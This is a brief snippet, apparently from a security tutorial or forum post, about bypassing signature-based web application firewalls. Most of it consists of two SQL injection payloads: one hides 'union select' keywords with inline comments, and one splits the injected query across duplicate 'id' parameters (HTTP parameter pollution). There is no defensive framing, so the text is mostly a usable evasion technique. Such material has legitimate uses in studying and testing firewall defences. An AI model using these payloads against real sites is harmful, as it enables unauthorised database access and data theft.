Most of WAFs are based on signatures, so there are plenty of ways to modify request and bypass them.
e.g.:
/?id=1+union+select+1,2,3/* => /?id=1+un/**/ion+sel/**/ect+1,2,3--
/?id=1;select+1,2,3+from+users+where+id=1-- => /?id=1;select+1&id=2,3+from+users+where+id=1--
